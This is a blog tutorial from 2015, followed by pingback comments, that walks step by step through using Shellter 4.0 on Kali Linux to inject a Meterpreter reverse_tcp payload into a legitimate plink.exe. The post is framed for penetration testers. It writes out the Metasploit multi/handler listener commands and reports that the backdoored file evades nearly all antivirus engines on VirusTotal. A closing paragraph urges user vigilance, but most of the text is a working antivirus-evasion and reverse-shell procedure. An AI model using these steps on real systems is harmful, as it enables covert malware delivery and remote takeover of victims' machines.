Anti-Virus Bypass with Shellter 4.0 on Kali Linux

Having trouble getting a Meterpreter shell past that pesky AV? Check out the new Shellter 4.0 shell obfuscation program!

The latest version of Shellter for pentesters was revealed at B-Sides Lisbon earlier this month. Updates include increased obfuscation through a custom encoder and polymorphic decoder. Also this version saves a few steps by including the most common Meterpreter shells.

Shellter works by taking a legit Windows .exe file, adds the shell code to it and then does a great job of modifying the file for AV bypass. The program’s automatic mode makes the whole process very pain free. In this tutorial I used the latest version of Kali Linux and a Windows 7 Virtual Machine.

So enough talk, let’s see it in action!

1. Download and install “shellter” ( https://www.shellterproject.com/download/ )

**Note: the Kali repos apparently don’t contain the newest 4.0 version yet. To get the latest, instead of using ‘apt-get install shellter’, just download and extract the ZIP file to the “/etc/share” folder.

2. Grab “plink.exe” from Kali’s ‘usr/share/windows-binaries’ directory and copy it into the Shellter directory.

3. Start Shellter – ‘shellter’ from the terminal or use ‘wineconsole shelter’ from ‘/etc/share/shellter’ if you manually installed.

av bypass shellter 111

4. Choose ‘A’ for Automatic Mode

5. At the PE Target Prompt, enter “plink.exe”

6. When prompted for Payloads select “L” and then “1”

av bypass shellter 21

7. Next, enter the IP address of your Kali system (mine is 192.168.1.39)

8. And the port to use (I used 5555)

av bypass shellter 311

Shellter will obfuscate the code and crunch for a while. Then you should see:

Shellter Kali AV 411

Success!

9. Now we need to start a listener service on the Kali system using the same settings from above:

• start Metasploit (‘msfconsole’ in a terminal)
• use exploit/multi/handler
• set payload windows/meterpreter/reverse_tcp
• set lhost 192.168.1.39
• set lport 5555
• exploit

10. Now that Kali is waiting for a connection. Copy our evil plink.exe command to the Windows 7 system and run it:

Shellter Kali AV 5

And we have a shell!

Shellter Kali AV 6

Compare the size of the backdoored exe to the original one. They are the exact same size! Now upload the backdoored exe to Virustotal and scan it for malicious content:

Shellter Kali AV 7

One (!) anti-virus engine detected it as malicious. And it was not a mainstream AV normally found in companies…

Conclusion

As you can see, a backdoored file that will bypass AV can be created pretty easily. AV is great but it can’t stop everything, you need to train your company users to be vigilant when using internet sites, social media and e-mail. Avoid suspicious websites, don’t allow website popups or warnings to install anything and never open unsolicited or suspicious attachments in e-mails. If you don’t know if you should click on something, ask your IT department. A little user vigilance can go a long way at protecting your network!

(Post Updated 7/13/15 – Changed command from “wine shellter” to “wineconsole shellter” and updated pictures accordingly.)

~ by D. Dieterle on July 12, 2015.

9 Responses to “Anti-Virus Bypass with Shellter 4.0 on Kali Linux”

  1. It is better to use “wineconsole shellter.exe” rather than “wine shellter.exe”. In that way you get a proper cmd console and a colorful output.🙂

  2. […] Having trouble getting a Meterpreter shell past that pesky AV? Check out the new Shellter 4.0 shell obfuscation program! The latest version of Shellter for pentesters was revealed at B-Sides Lisbon  […]

  3. […] As you can see, a backdoored file that will bypass AV can be created pretty easily. AV is great but it can’t stop everything, you need to train your company users to be vigilant when using internet sites, social media and e-mail. Avoid suspicious websites, don’t allow website popups or warnings to install anything and never open unsolicited or suspicious attachments in e-mails. If you don’t know if you should click on something, ask your IT department. A little user vigilance can go a long way at protecting your network! The Author: This wonderful tutorial has been written and first published by Cyberarms. […]

  4. […] As you can see, a backdoored file that will bypass AV can be created pretty easily. AV is great but it can’t stop everything, you need to train your company users to be vigilant when using internet sites, social media and e-mail. Avoid suspicious websites, don’t allow website popups or warnings to install anything and never open unsolicited or suspicious attachments in e-mails. If you don’t know if you should click on something, ask your IT department. A little user vigilance can go a long way at protecting your network! The Author: This wonderful tutorial has been written and first published by Cyberarms. […]

  5. […] Anti-Virus Bypass with Shellter 4.0 on Kali Linux […]

  6. […] Anti-Virus Bypass with Shellter 4.0 on Kali Linux – cyberarms.wordpress.com Having trouble getting a Meterpreter shell past that pesky AV? Check out the new Shellter 4.0 shell obfuscation program! […]

  7. […] Having trouble getting a Meterpreter shell past that pesky AV? Check out the new Shellter 4.0 shell obfuscation program! The latest version of Shellter for pentesters was revealed at B-Sides Lisbon earlier this month.  […]

  8. […] Having trouble getting a Meterpreter shell past that pesky AV? Check out the new Shellter 4.0 shell obfuscation program! The latest version of Shellter for pentesters was revealed at B-Sides Lisbon…  […]

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

 
%d bloggers like this: